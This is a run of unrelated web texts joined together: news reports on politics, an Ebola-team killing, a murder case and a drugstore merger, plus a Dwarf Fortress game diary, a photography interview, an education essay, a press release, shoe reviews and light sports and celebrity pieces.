The White House has obliquely defended Kushner's actions while refusing to comment on them specifically. “We have back-channel communications with a number of countries. So, generally speaking, about back-channel communications, what that allows you to do is to communicate in a discreet manner,” National-Security Adviser H.R. McMaster told reporters on Saturday. Asked whether it would be cause for concern if a National Security Council staffer used such a back-channel to Moscow, he said: "No, I would not be concerned about it."
"What puts this in an entirely different category is that this is a transition; they weren't in the government yet,” said Paul Pillar, a former analyst with the Central Intelligence Agency. "That's really a departure. It's normal for an incoming administration to have contacts with foreign leaders, but I can't think of a precedent for this kind of thing."
And former national-security officials noted that while back-channel communications are often compartmentalized—meaning they can only be viewed by a select number of officials—they usually have some level of involvement from national-security officials. Communicating with Moscow using Russian facilities could have shielded Kushner's correspondence from U.S. intelligence agencies, without denying their Russian counterparts the same access.
“The only reason you would operate that way is if you were hiding something from your own government. That's it. That's the only plausible explanation," said Nada Bakos, a fellow at the Foreign Policy Research Institute and a former CIA analyst. “There's compartmentalized classification—if they wanted to take this to the highest level of classification they could do that. It didn't have to be widely disseminated.”
Reports from The New York Times and The Wall Street Journal have cited anonymous administration officials claiming that the purpose of the communications would have been to discuss the Syrian civil war. But that explanation raises similar issues: If that was the topic, why would Kushner want to cut out U.S. officials? And why couldn't it wait until after the transition?
President Trump has made prolific use of Twitter. (Carlo Allegri/Reuters)
Twitter's chief operating officer, Anthony Noto, threw out an idea Friday morning in response to President Trump's threat to cancel press briefings:
@realDonaldTrump May I suggest questions submitted and answered via Twitter. A perfect record and we distribute to the world not just those with a TV — Anthony Noto (@anthonynoto) May 12, 2017
That did not go over well. The backlash was immediate.
Chris Sacca, well-known venture capitalist, reminded Noto that “monthly average users” is not the only metric that matters:
@anthonynoto @realDonaldTrump Tweets enabling lying despots in their relentless attempts to subvert democracy are not your best look. Don't chase MAUs to the dark side. — Chris Sacca (@sacca) May 12, 2017
Another Silicon Valley venture capitalist, Hunter Walk:
@sacca @mhelft @anthonynoto @realDonaldTrump Ty Chris. Remember Les Moonves “trump might not be good for America but he's great for CBS” — Hunter Walk (@hunterwalk) May 12, 2017
Of course, the beauty of Twitter is that anyone can chime in with the sharpest response, like this one from Luke Rolling, who identifies himself as a “telemedicine professional”:
@anthonynoto @realDonaldTrump Wow … what an absolutely awful idea. Good reason why corporate business leaders should not be leading governments — Luke Roling (@RealLukeRoling) May 12, 2017
Noto reconsidered his idea nearly four hours later, posting:
(Add details, Prime Minister's statement, background)
CONAKRY, Sept 18 (Reuters) - Eight bodies, including those of three journalists, were found after an attack on a team trying to educate locals on the risks of the Ebola virus in a remote area of southeastern Guinea, a government spokesman said on Thursday.
"The eight bodies were found in the village latrine. Three of them had their throats slit," Damantang Albert Camara told Reuters by telephone in Conakry.
However, Guinea's Prime Minister Mohamed Saïd Fofana, speaking in a television message that had been recorded earlier, said 7 bodies of 9 missing people had been found.
He said six people have been arrested following the incident, which took place on Tuesday in Wome, a village close to the town of Nzerekore, in Guinea's southeast, where Ebola was first identified in March.
Since then the virus has killed some 2,630 people and infected at least 5,357 people, according to World Health Organization (WHO), mostly in Guinea, neighbouring Sierra Leone and Liberia. It has also spread to Senegal and Nigeria.
Authorities in the region are faced with widespread fears, misinformation and stigma among residents of the affected countries, complicating efforts to contain the highly contagious disease.
Fofana said the team that included local administrators, two medical officers, a preacher and three accompanying journalists, was attacked by a hostile stone-throwing crowd from the village when they tried to inform people about Ebola.
He said it was regrettable that the incident occurred as the international community was mobilising to help countries struggling to contain the disease. (Reporting by Saliou Samb; Writing by Bate Felix; Editing by Robin Pomeroy and Ken Wills)
Our Standards: The Thomson Reuters Trust Principles.
Now completely protected, and brimming with fresh supplies of wood, ore, and booze, my fortress is doing better than ever. And then I notice that my dwarves, having not seen the sun for too long, have been puking their guts out all the way to and from the trade depot. They've been walking on a path of puke. That's really gross.
Rather than bemoan this, I embrace it! I order the path and part of the outside courtyard to be paved over with olivine – a stone well known for its rich, puke-green color.
But it raises a dilemma. I don't want my dwarves to become cave-adapted… but I don't want them going outside all the time either, even within the walls. They'd get in the way of more important operations, like farming.
I come up with a solution. I'll dig a giant hole in the earth, leading 3 Z-levels down, to the dining level. At the bottom will be a new statue garden. Dwarves love their statue gardens and will surely want to hang out there, even though the nauseating sun will shine down upon them.
Look at those pathetic miners. Look at how little stone they leave behind, how slowly they work! Oh 1 and 2, how I miss you.
Unfortunately, the top of the hole must emerge OUTSIDE the protective walls of my fortress. I suppose I'm going to have to risk it.
With half the digging complete, I need to get miners and masons outside so that they can mine downward and construct a wall around the hole. It's too risky to use the trader's airlock, so I build a much smaller airlock consisting of 4 doors. Two doors can be locked manually, and the other two are locked by levers. I think it's a pretty clever design.
Once again beset upon by goblins, I discover I am wrong.
I should mention at this point that I do now in fact have a military. But they are strictly marksdwarves. None of that risky injury-inducing melee combat! Here's a shot of them training. This is just inside the fortress.
I once tried building fortified towers for them to shoot from, stationed atop my fortress walls, but that didn't seem to work. So I have them stationed on the ground, instead.
Amazingly, despite harrasment from the goblins AND kobolds, I manage to get the entire hole dug, and walls built around it for extra protection. I'm pleased.
But all of a sudden, the announcements feed is spammed with these:
What? Someone was injured? Who? I hope it's nobody important…
Shit. Another of the numbered dwarves.
‘6' Rigòthothlest is a VERY important dwarf… just look at all the stuff she's good at!
While normally a broken arm isn't such a big deal, she'll die for sure unless I find a way to get water.
Meanwhile, the barf statue garden is working spectacularly.
Those dwarves will lose their cave adaption in no time!
6 begins to die a slow and painful death. I try everything. Maybe beer will be good enough? Wait, I have milk! Will milk work? I stockpile both of them next to her bed. Nothing. Maybe I can I build a well somewhere? No, wells don't just magically produce water…
I have no options. As 6's condition worsens, I decide that the most humane (dwarfane?) thing would be to allow her to die a quick death. I begin construction on a magma pipeline, to fill her room and end her misery.
She dies of thirst before its completion.
I have her body laid to rest in a silver sarcophagus in her room. And then I flood the room with magma anyway. It seems like a dwarfy way to be buried.
Electric City Timelapse – Teaser from Crockwell Photography on Vimeo.
A seed growing into a plant. Stars moving as the Earth rotates. Tidal shift. The world is constantly changing around us, but with time-lapse photography this secret movement is something we can watch with our own eyes. Local photographer Chris Crockwell was so fascinated by time-lapse videos online that he decided to give St. John's a similar treatment. He grabbed his tripod and camera and started snapping. And the results are amazing. I sent him a few quick questions after watching the video above.
So why did you decide to start doing time lapses?
There are some amazing time-lapse videos online showing exotic locations all around the world. I love the effect of the videos as well as the process of creating them. I have been creating landscape photographs around St. John's and Newfoundland for many years, so I already knew of some great places to set up and create my own.
How long did each of these shots take you to set up?
Each scene is comprised of approximately 30 minutes of shooting, with a photo taken every second. That's almost 2000 photographs. Of course it takes time in getting to the locations, setting up the equipment, and experimenting to find the best composition… 30 minutes of shooting results in a 1.5-minute video clip. Combining the clips and adding music is the last stage and definitely the longest part of the process.
Which clip of yours is your favourite?
My favourite time-lapse is probably the Signal Hill scene, where the passing cars are reflected in the pond below. It looks like energy pulses or electricity passing through. I haven't seen a clip like that before. It's a modern perspective of an historical scene.
Did anything unusual happen as you were taking these?
The world looks so different when recorded through a time-lapse, and you don't always know how it will look until the video has been processed. As the time-lapse recording was getting close to the end I would get excited to watch the final video. And I'm often really amused by the unusual results, like the ferry peeling out of the harbour or planes flying around the city.
The other day I did a time-lapse of people sliding at Pippy Park and the final video was somewhat boring except for this one kid who stood out who was flopping around the bottom of the hill for a long time, being cranky with his snowboard, and finally he kicked his snowboard all the way back up the hill.
There's nothing better than watching a beautiful evening unfold in front of your camera knowing that everything that happens in that 30 minutes will be a part of your time-lapse forever.
Find out more at www.crockwellphotography.com
A 24-year old man wanted in an April 16 Cedar Creek murder has been arrested in San Antonio, officials said Monday.
The Lone Star Fugitive Task Force apprehended Calton Hayes Weir in the San Antonio area, Bastrop Sheriff's spokeswoman Sissy Jones said in an email. Once Weir is magistrated he will be transferred to the Bastrop County Jail.
The Bastrop County sheriff's office had issued an arrest warrant for Weir, a Cedar Creek resident, according to a statement released April 17. The bond is set at $1 million, according to a probable cause affidavit.
Sheriff's deputies responded at 4:27 a.m. April 16 to a call at 160 Northside Ln. Lane in Cedar Creek, according to the statement. One of the residents, Justin Coleman, 42, was found dead in the residence with a gunshot wound.
The Cedar Creek residence is a mobile home located in a secluded wooded area off a dirt road. Leading up to the property, a "No Trespassing" sign is posted and a second sign depicts a pointed gun that reads "WARNING: There is nothing worth dying for here."
A woman living at the residence told investigators that, between 9 p.m. April 15 and midnight April 16, Weir and two other men came to the property claiming Coleman owed Weir money for some speakers, according to the affidavit. Weir was carrying a 9 mm pistol, the affidavit said.
The three men threatened to take the rims from Coleman's car and beat him up after he refused to come out of his bedroom, the affidavit said. The woman told investigators that the men began to damage Coleman's vehicle, and she tried to get them to stop.
Pieces of broken glass could be seen on the porch of the home Thursday afternoon. The windshield of a car parked on the property nearby was bashed in.
The woman went back inside the residence and saw Coleman in the kitchen wearing a ballistic vest and carrying a shotgun, a .22-caliber pistol and a bag of sugar, stating his intention to mess with their vehicle in retaliation for the damage to his car, according to the affidavit.
Coleman went outside and said, "Nobody moves or I'll shoot" before pouring sugar into the gas tank of Weir's truck, the affidavit said. Coleman threatened to open fire on the men if they didn't leave in 10 minutes, the affidavit said.
Moments later, the woman was walking down the driveway toward FM 535 with Weir's two companions when she heard about 10 gunshots, according to the affidavit. The woman told investigators that Weir got in his truck, backed into a tree, picked up his friends and drove away, the affidavit said.
The woman returned to the residence with another man who also had witnessed the dispute, the affidavit said. They saw broken glass and blood at the front door and found Coleman face down and dead in his bedroom, according to the affidavit. The woman then called 911.
The woman and the other witness told investigators where Weir and the two other men live in Cedar Creek, according to the affidavit. The investigator found shell casings in the driveway and bullet holes in the residence, the affidavit said.
No further details have been made available. An investigation into the murder is ongoing, the statement said.
This post is part of a series in which LinkedIn Influencers pick one big idea that will shape 2014. See all the ideas here.
If you examine job ads these days you'll probably notice one common trait among them: they all ask for a college degree. That piece of paper—whether it's an associate's, bachelor's, or master's degree—remains the prime signal to an employer that the applicant is at least minimally qualified to fill the position.
But what does a college degree really tell employers about how much an applicant knows, about how much they learned to earn that credential?
When employers see a job candidate with a bachelor's degree, for example, they are assured of only one thing: that the person had the self-discipline to complete 120 credit hours to qualify for the degree. It is why rankings, like those from U.S. News & World Report, play an outsized role in every type of schooling from undergraduate colleges to business schools to law schools. For employers and the public, a diploma from a top school is a signal that the graduate had to at least survive a rigorous game to get past Go.
In the 21st Century global economy, we need a better signal than the 20th Century version of the college degree.
My big idea for 2014 is that more colleges shift from measuring learning based on how much time students spend in a classroom to a system that is based on how much they actually know. The official term for this is “competency-based education,” and this past year, three universities—Northern Arizona University, the University of Wisconsin, and Southern New Hampshire—experimented with offering degrees in this way.
Here's how it basically works: Students demonstrate mastery of a subject through a series of assessment tests or assignments, instead of following a prescribed set of courses. Faculty mentors work closely with students throughout a degree program to design a schedule and access the learning materials they need to demonstrate mastery and then another group of course evaluators grades those exams, research papers, or performance assessments.
We've all been in classes that moved too slow or too fast for our tastes. Competency-based education allows for more individualized instruction. If students understand the material they move on without waiting until the end of the typical fifteen-week semester they would find at most colleges. On the other hand, when they struggle with a concept, they are free to spend as much time as they need to grasp the subject, unhindered from the traditional academic calendar that puts a clock on the class.
The first graduate of Southern New Hampshire's self-paced program, dubbed College for America, finished his associate's degree in about 100 days. Because students pay a flat fee for a term where they can fit in as many assessments as they want, competency-based degrees are often less expensive than traditional degrees, too.
At Western Governors University, which has followed a competency-based model since it was founded in the late 1990s, 25,000 students pay just under $3,000 a semester for as many courses as they can complete in a six-month period. The average student at Western Governors completes a bachelor's degree in about two and half years for a price tag in the neighborhood of $15,000. That's about half the time it takes the typical student in traditional higher ed to get a bachelor's degree and half the price.
For all the attention showered on Massive Open Online Courses (MOOCs) this past year for being innovative, it is competency-based degrees in my opinion that have the real potential to bend the cost curve in higher ed by reducing the time to a degree.
Right now, that system is measured in credits, semesters, academic years. The foundation of this system is the credit hour, a concept defined officially by the federal government as one hour of direct faculty instruction and two hours of work outside of class each week during the semester.
The rules allow for alternatives, including internships and lab work, but all are based on the standard of time spent in a chair. This method of measurement, of course, fails to assess what is actually learned in those seats in any meaningful way. It also doesn't serve the 37 million Americans who have some college credits but no degree and don't have the time or money to sit in a college classroom for hours a week for several months.
Now, some might question the legitimacy of a degree that isn't earned by spending those hours in a classroom. I certainly did at first. While writing my book on the future of higher ed, I met a student at Western Governors, Sheryl Schuh. Her shortest class, Reasoning and Problem-Solving, lasted just two weeks; her longest class, Tax and Financial Accounting, ran fourteen.
“I couldn't pass that assessment and move on until I got a B,” she says of the tax class. “So I studied more, I read more, I worked through more problems. Anywhere else, I would have been happy enough with a C and moved on. Here, I couldn't quit. I'd call that rigorous.”
It also tells employers that there's more behind her degree than simply sitting in a class for 15 weeks.
Jeffrey Selingo is author of College (Un)Bound: The Future of Higher Education and What It Means for Students, contributing editor at The Chronicle of Higher Education, and a professor of practice at Arizona State University. Follow him here by clicking the FOLLOW button above, at jeffselingo.com, and on Twitter @jselingo
Photo: l i g h t p o e t / shutterstock
Show full PR text
LSI Announces Agreement to Acquire SandForce
Acquisition of leading provider of flash storage processors extends LSI's industry-leading position and breadth in storage technology solutions
MILPITAS, Calif., Oct. 26, 2011 /PRNewswire/ -- LSI Corporation (NYSE: LSI) today announced that it has signed a definitive agreement to acquire SandForce, Inc., the leading provider of flash storage processors for enterprise and client flash solutions and solid state drives (SSDs). Under the agreement, LSI will pay approximately $322 million in cash, net of cash assumed, and assume approximately $48 million of unvested stock options and restricted shares held by SandForce employees.
SandForce's award-winning products include flash storage processors at the heart of PCIe flash adapters and SSDs. Flash storage processors provide the intelligence required to deliver the performance and low-latency benefits of flash storage in enterprise and client applications. With market-proven, differentiated DuraClass™ technology, SandForce flash storage processors improve the reliability, endurance and power efficiency of flash-based storage solutions.
The acquisition greatly enhances LSI's competitive position in the fast-growing server and storage PCIe flash adapter market, where the WarpDrive™ family of products from LSI already uses SandForce flash storage processors. The complementary combination of LSI's custom capability and SandForce's standard product offering propels LSI into an industry-leading position in the rapidly growing, high-volume flash storage processor market space for ultrabook, notebook and enterprise SSD and flash solutions.
"Flash-based solutions are critical for accelerating application performance in servers, storage and client devices," said Abhi Talwalkar, LSI president and chief executive officer. "Adding SandForce's technology to LSI's broad storage portfolio is consistent with our mission to accelerate storage and networking. The acquisition represents a significant, rapidly growing market opportunity for LSI over the next several years."
Michael Raam, SandForce president and CEO, said, "The combination of SandForce and LSI allows us to deliver differentiated solutions in the PCIe flash adapter segment by tightly integrating flash memory and management. In addition, leveraging our flash storage processors with LSI's comprehensive IP portfolio and leading-edge silicon design platforms will lead to innovative solutions."
The transaction is expected to close early in the first quarter of 2012 subject to customary closing conditions and regulatory approvals. Upon closing, the SandForce team will become part of LSI's newly formed Flash Components Division, with Raam as general manager.
LSI expects the acquisition to be neutral to non-GAAP* earnings per share in 2012. The company will provide further details during its conference call at 2 p.m. PDT today and discuss third quarter results and the fourth quarter 2011 business outlook.
Ever wonder what that jazz step you saw in a competition is called? Want to see it broken down by counts? Previously, your main options were to ask a local teacher for help or go down a YouTube hole to try and find an instructional video about it. Enter the Jazz Roots Bank.
The Jazz Roots Bank is a project to "compile examples and references on vernacular jazz steps to make a reliable source of knowledge, accessible to everyone." It's a fledgling effort by JazzConnexion, a solo jazz team out of Montreal, Canada, but that we think shows a lot of promise.
Basically it's an alphabetical listing of currently 90-ish jazz steps, including a video demonstrating the move, references, historic videos, and any "didactic" or instructional videos. Basically everything you would need to try and master the Black Bottom, the Hangman, or the Shish Ka Boom Ba II.
Rahm Emanuel and his so-called friend Bruce Rauner.
Illinois governor Bruce Rauner and Chicago mayor Rahm Emanuel are longtime friends and business partners, so one might expect Rauner to offer some words of encouragement as his buddy deals with the fallout from the fatal police shooting of 17-year-old Laquan McDonald. Instead, Rauner panned the performance of Emanuel and Cook County state's attorney Anita Alvarez during an unrelated press conference on Monday. “I am very disappointed in the mayor and in the state's attorney for Cook County; very disappointed,” he said. “I'm not going to say more than that right now, because there's a lot of investigation going on, but I'm very disappointed.”
Protesters have been calling for Mayor Emanuel's resignation for weeks, and last month Democratic state representative La Shawn Ford introduced legislation that would create a mechanism for recalling the mayor. “I've not studied the bill that's been proposed, but what I've been informed about it, based upon that, I would sign that bill,” the governor said.
Polls suggest Emanuel's approval rating is around 18 percent, but it still seems unlikely that the mayor will be recalled. While the original proposal said the recall bill would be “effective immediately,” the governor said his legal team advised him that the measure could not apply to sitting elected officials. Plus, Democratic leaders in the legislature don't appear interested in passing the legislation. So luckily for Rauner, he'll probably only have to approve his buddy's ouster in theory.
Rated 5 out of 5 by Damistress from My son says these shoes are very comfortable and he loves them!
Rated 5 out of 5 by M1lt from Great shoes for wide feet or special needs... I've tried for years to wear more fashionable shoes when running or going to the gym, but I keep coming back to these. They are heavy compared to shoes made specifically for running, but these are the only shoes in this price range that I can run 3 miles in and my feet don't hurt afterwards. I have flat feet and bunions, so I'm a special case. Dad shoes for life! (or until I have bunion removal surgery on my feet :)
Rated 5 out of 5 by AustinW218001554 from Woah. Now I know these shoes get classified as "dad shoes", but I don't care what anyone says, these are lowkey fire.
Rated 1 out of 5 by AndrewP229690737 from Your grandfather's shoe - time to get rid of this model! This is an old model sneaker and I'm surprised that it's still being produced by Nike, but it appears to be a popular shoe (which is fine). My father purchased this same shoe about 15 years ago and then, he purchased a pair last week, which I promptly returned for him. They look clubby, uncomfortable, and completely out of style. I guess they're OK for the grandfather look, but my dad needs something more comfortable in terms of fit, and sleek in terms of appearance and durability. He's a morning walker and this is not the shoe for that considering the hills in San Francisco.
Welcome to a very special installment of Fun With the Photo Tool. We've done this before. But this is a very special installment.
It started innocently enough. I was perusing the 6,349 different results for the search term "strikes out" in the SB Nation photo tool. That's not hyperbole. There were 6,349 different results. Most of them were Grade-A dagnabbit-face:
There were a lot of great results. People swinging at balls over their heads, bats flying into the stands, Norichika Aoki pirouetting into the visiting dugout ... it was fascinating.
But as the pictures kept coming, something became clear: A-Rod's strikeout face is one of the greatest I've ever scouted. A pure 80 strikeout faces. For every stupid strikeout face that anyone else made, Alex Rodriguez made three.
Part of this is that when the good folks at Getty or US Presswire are working, they're paying special attention to A-Rod. They're paying attention to Carlos Corporan, or whomever, sure. But they're really paying attention to Alex Rodriguez. And it makes for some outstanding A-Rod strikeout faces.
The other part is that A-Rod makes a lot of stupid strikeout faces.
Here are a few, with suggested titles.
The Nnnnyyyeeah
Photo credit: Kim Klement-US PRESSWIRE
I'm pretty sure if you panned back, Rodriguez would be pointed directly at the pitcher while making this face. Can we get a ... no? Okay, we don't have that point of view.
The Karaoke
Tim Farrell/THE-STAR LEDGER via US PRESSWIRE
What's your karaoke song? I'm partial to "Space Oddity" by David Bowie because after a few drinks, I think I sound like him. But there's something to be said for a good "Runnin' With the Devil" to get the juices flowing.
You might think Rodriguez has a favorite song like that, and that he's singing "What a Fool Believes" or something else with falsetto notes. "More Than a Feeling," maybe. But you're wrong. You know what A-Rod sings at karaoke? A song that he had never heard before last week, when he walked into a room with five people singing along at the top of their lungs. It doesn't matter if it's Garth Brooks's "Rodeo" or Manowar's "Warriors of the World United."
One week later, that's A-Rod's jam, and he's in the middle of the singalong like nothing weird happened. He's always loved that song. What?
Also, it's a trick question. He's not singing. He's making a strikeout face. He's good at those faces, man.
Dog Fur?!?!?
Tim Farrell/THE-STAR LEDGER via US PRESSWIRE
As in a precocious child on a sitcom gave him something to eat, and it was revealed to be something awful for the studio audience's amusement. Dog fur?!? Tainted clams?!? Human flesh?!? Ewwwww. Something hilarious and unexpected and grody.
Don't sleep on the reactions behind A-Rod, either. Those are the little birds that clean the teeth of the A-Rod-strikeout-face hippo.
The Sarcastic Clap
Photo by Mike Stobe/Getty Images
He is almost certainly looking at the pitcher in this one, too, and saying things like, "Oh, nice pitch, Clay. You have such good stuff" while clapping sarcastically.
I think A-Rod gets miscast as a villain too often. He's more of a bumbler. He doesn't mean to be malicious or disliked, but he can't get out of his own way.
In this picture, though, he's pure '80s villain. He just scored the highest score at the Summer Campathlon, and there's just no way the protagonist can beat that.
Unfettered Rage
Photo by Chris McGrath/Getty Images
Simple, seething, pure, unfettered rage. You saw Rodriguez get into a fight with Jason Varitek, right? Did you buy it? Seemed pretty focus-group to me. Dunno, maybe that's too harsh. But it's hard to imagine A-Rod getting uncontrollably angry.
Up there, though. That's a murder face. Boy, howdy, Mr. Jason Varitek is glad that he isn't on the business end of that fella.
Alternate title: Alex Rodriguez Is a Moray Eel.
Tantrum
Photo by Mike Stobe/Getty Images
Unfettered rage's dorkier kid brother. A sample of Alex Rodriguez's Tantrum would be in the inside of every "ESPN: The Magazine" for a year, and it would make possums lurk around your mailbox for weeks after you took it out. For god's sake, don't open the sample. It will make you sterile, and that's if you're lucky.
The Calm Wizard
Kim Klement-US PRESSWIRE
That bat looks photoshopped, right? Even though he's doing a Ministry of Silly Walks thing, it's the bat that gets me. Something about the white reflection around the perimeter of the bat that makes it look like someone dropped it in the picture in MS Paint to put on an invitation for a kid's birthday party.
The Beverly Hills
John Munson/THE STAR-LEDGER via USA TODAY Sports
"But how does it look?"
"Looks good, looks great."
"But do I look younger?"
"Oh, god, years younger. I thought I was looking at your yearbook photo."
"They didn't get the skin too tight?"
"No, no, looks perfect."
"I don't look like a snapping turtle caught in a piece of Saran Wrap?"
"..."
"..."
"No, no, you look good. They did a good job."
My 5-Year-Old Daughter
John Munson/THE STAR-LEDGER via USA TODAY Sports
My 5-year-old daughter is always doing stuff like this. LOOK DAD, LOOK. I look, and she's holding a spoon with one arm, and holding a Hula Hoop up by her ankle. LOOK DAD, LOOK. I look and she's balancing a magazine on her head while falling down the stairs. It's amusing.
That's what A-Rod's doing, nothing more. Look at me transfer the bat from hand to hand in the air on one leg. See that? Love me. Respect me. Love me. Please.
Yarrrrr
Jerry Lai-USA TODAY Sports
And when the music played, and he popped open the can, it was filled with nothing but drugs. Drugs and drugs and drugs. He swallowed them all, and he did feel stronger. He felt like he could take on the world. So why did everyone hate him? Why was Bluto laughing at him and playing with Olive Oyl's hair? What's wrong? This isn't how it was supposed to go. THIS ISN'T HOW IT WAS SUPPOSED TO GO.
Yarrr.
(Reuters) - Drugstore chain Walgreens Boots Alliance Inc (WBA.O) scrapped its deal to buy Rite Aid Corp (RAD.N) after failing to win antitrust approval, but said it would instead buy nearly half of the smaller rival's U.S. stores for $5.18 billion.
Rite Aid's shares plunged about 28 percent to $2.85, while Walgreens shares were up 1 percent at $77.97. Walgreens also ended a related deal to sell as many as 1,200 Rite Aid stores to Fred's Inc (FRED.O), sending Fred's shares down 19 percent.
Walgreens, the biggest U.S. drugstore chain, will likely have an easier time winning antitrust approval to buy 2,186 Rite Aid stores after it failed to win approval to take over the nearly 4,600-store chain.
“Walgreens and Rite Aid have taken a pragmatic approach,” said Neil Saunders, managing director of market research firm GlobalData Retail.
The revised deal could offer many of the same benefits as a whole-sale take out of the company, but on a smaller scale.
Walgreens said it expects about $400 million of cost savings from its new agreement, down from around $1 billion expected from the original deal.
That could help offset challenges it faced in recent years hitting targets for sales growth, which has been weighed on in part by disappointing growth in its retail segment.
Walgreens also invited Rite Aid to join its group purchasing agreement, which aims to leverage the combined heft of its members to negotiate discounts on generic drug prices.
The decision to sell so many stores will weaken Rite Aid and could still be controversial, said David Balto, an antitrust lawyer who had worked with groups opposing Walgreens' takeover of Rite Aid.
“Rite Aid's future is going to be bleak after they sell these stores. This is still going to raise some serious questions. It's still taking out a major competitor,” Balto said.
A sign marks a Rite Aid pharmacy in Somerville, Massachusetts, U.S., June 29, 2017. REUTERS/Brian Snyder
In fact, Walgreens' plan to buy 2,186 Rite Aid stores accomplishes many of the same goals as the merger - including eliminating Rite Aid as a rival - but does so in a way that makes it harder for the FTC to take the companies to court to stop the transaction, antitrust experts said.
“Obviously no victory dance for the FTC today. This was a big stick-it-to-you. They're (the FTC) getting a worse outcome than they would before,” said Andre Barlow of the law firm Doyle, Barlow and Mazard PLLC. “Clearly they (the companies) know what the FTC concerns are. They have likely worked around those issues, which has to be very frustrating for the FTC.”
The FTC sued to stop two separate deals last week, suggesting that former administration's tough antitrust approach will continue under President Donald Trump. The agency is being run by Acting Chairwoman Maureen Ohlhausen and three commissioner slots are vacant.
The FTC said on Thursday it would review the new proposal.
WALGREENS TO PAY MORE PER STORE
Rite Aid said the stores to be sold are mainly in the Northeast, Mid-Atlantic and Southeast. The deal also includes distribution centers in Connecticut, Pennsylvania and South Carolina.
Leerink Partners analyst David Larsen estimated that under the new deal, Walgreens would be paying $2.4 million per Rite Aid store, higher than what it would have paid under a previous agreement, where it would have paid $2.04 million to $2.06 million per store.
Walgreens said on Thursday it expects the new deal to close within six months.
Walgreens also reported better-than-expected profit and sales for the third quarter, helped by a rise in prescription volumes in its U.S. pharmacy business.
The company also authorized a $5 billion buyback program and raised the lower end of its full-year profit forecast by 8 cents per share to a range of $4.98 to $5.08.
Slideshow (5 Images)
Analysts on average were expecting full-year profit of $4.96 per share, according to Thomson Reuters I/B/E/S.
The new agreement will assist Rite Aid in addressing pharmacy margin challenges and in significantly reducing debt, the company's CEO John Standley said in a statement.
Walgreens said it would pay Rite Aid a $325 million termination fee. In October 2015, Walgreens said it would buy No. 3 Rite Aid for $9.5 billion.
For just $20, your run-of-the-mill floormat does a marginally good job at cleaning the bottom of your shoes. But if you're willing to spend a little more, like $6,000, you can upgrade to this vacuum-powered mat that sucks every last bit of dirt off your soles.
The mat was developed by Paionia Furyokuki and its surface is perforated with valves that are only opened as they're stepped on. So as someone walks across the mat, it activates what are essentially a series of little vacuums that suck the dirt and debris off the sole of the shoe, and then into an external unit where it can be later disposed of. It's a little over-the-top as far as floor mats go (ok, a LOT over-the-top) but it ensures the surface doesn't get caked with dirt over time that's going to be carried into a building. Oh, and it goes without saying, but you never have to clean it. [DigInfo TV via Ubergizmo]
- We noted before that former WWE Diva Eve Torres was at NXT earlier this week meeting with some of the developmental talents. Eve commented via Twitter:
"Had a chance to meet some new WWE Diva "prospects" yesterday. Great group of beautiful, athletic, talented women. Future's looking bright!"
It turns out Eve was there to meet with 10 Diva prospects who were wrapping up a month-long training program. These are the women WWE found through the reported "Diva search" in Los Angeles and other major cities last month. It appears most of them were recruited through modeling agencies. Besides meeting with Eve Torres, we know the prospects worked with NXT trainers Sara Del Rey, Bill DeMott and either Ricky Steamboat or Dusty Rhodes.
One model, Olivia Karpinski, interacted with Eve on Twitter and told a fan that she was cut but that 5 other women made it through the camp.
We know few details about some of the prospects:
* Olivia Karpinski - print & commercial model, fitness coach, did not make it through the camp
* Natalie Eva Marie - actress, model, 2012 Powertec Fashion Model winner
* Aimee Fogelman - model
* Joseann Offerman - singer & model
* Maysa Quy - IFBB Pro Bombshell Athlete
* Jenn Sterger - model, actress, TV host
* CJ Perry - Red Bull spokesmodel
* Courtney Camero - "Jaguar" from VH1?s For the Love of Ray-J 2
Here is a photo of the prospects with Eve and Del Rey:
Ivanka Trump's “Why I Disagree With My Dad” ‘Us Weekly' Cover Story bashed online
>>Keep clicking for the funniest memes to come out of US Weekly's cover. >>Keep clicking for the funniest memes to come out of US Weekly's cover. Photo: Twitter Photo: Twitter Image 1 of / 33 Caption Close Ivanka Trump's “Why I Disagree With My Dad” ‘Us Weekly' Cover Story bashed online 1 / 33 Back to Gallery
This morning, the cover of the new US Weekly hit stands and it's already making wave. President Donald Trump's daughter, Ivanka Trump, is on the cover along with the headline, "Ivanka Takes A Stand: Why I Disagree With My Dad."
Online, a teaser of the story is posted under the headline, "How Ivanka Trump Influences Her Father Donald Trump." It highlights some of Ivanka's more liberal stances on issues like LGBTQ rights, climate change, NAFTA, and other topics where she disagrees with her father and the Trump administration.
"Sometimes [Ivanka] and Jared are a big influence on Donald and sometimes he takes other opinions into account and does something they disagree with," a source close to Ivanka told the publication. "They win some and they lose some."
EYES ON IVANKA: One weird thing you never noticed
(Story continues below.)
One such loss is the president's recent decision to abandon the Paris Agreement, which attempted to address climate change. Ivanka, the story explains, "was disappointed by his decision, but she's learned to take such defeats in stride."
Last month, Ivanka explained to The New York Times, "I'll go to the mat on certain issues and I may still lose those." But, she added, "Maybe along the way I've modified a position just slightly. And that's just great."
Notably, Us Weekly was sold to the Trump-friendly National Enquirer earlier this year, which some people pointed out on Twitter. But folks on Twitter were criticizing a lot more than the possible conflict of interest.
Almost instantly, people made memes using "Why I Disagree With My Dad" as the caption.
Others, noting that Ivanka really hasn't done all that much to denounce her father, photoshopped the cover headline to read, "Why I Silently Disagree With My Dad" with Ivanka holding a finger over her mouth. Another changed the headline to "Why I *Publicly Pretend To* Disagree With My Dad."
Check out some of the best reactions in the slideshow above. Fortunately, no "covfefe" was involved.
Gov. Nathan Deal Monday countered critics of his veto of the controversial bill that would have allowed guns on college campuses with the exceptions of dorms, fraternities and sororities, and sporting events.
After state lawmakers passed the “campus carry” bill earlier this year, Deal asked them to amend it to address his concerns about weapons in campus day cares, administrative buildings and into disciplinary hearings.
They declined.
Monday, the governor indicated he is opposed to students taking guns on campus.
Speaking to reporters, Deal noted The University of Georgia opened in 1785, and since then, said Deal, “we've been through major wars, conflicts and upheavals in this country and in the world. Why all of a sudden in 2016 do we need weapons in the hands of college students?”
In a statement about his veto, Deal made a similar point that “having college campuses free of weapons has great historical precedent.”
Deal has faced loud criticism from some lawmakers since that veto, including Republican Rep. Kevin Cooke of Carrollton.
“We're going to be stuck with him for two more stinking years,” said Cooke in an interview with WLBB radio.
“All he's doing systematically is tearing down anything good that we could have done,” said Cooke. “Heck, we're building his legacy, trying to build it for him. And what's he doing? He's running the other way.”
Cooke also called Deal a Democrat and said he's “the reason Donald Trump is the nominee for president.”
“Some people want to have their own self-importance,” Deal said. “Kevin Cooke has never been in my office, by the way.”
The governor went on to question Cooke's own status as a Republican, telling reporters, “he may be a RINO [Republican In Name Only].”
Republican legislators say they will try again next year to pass a “campus carry” bill.
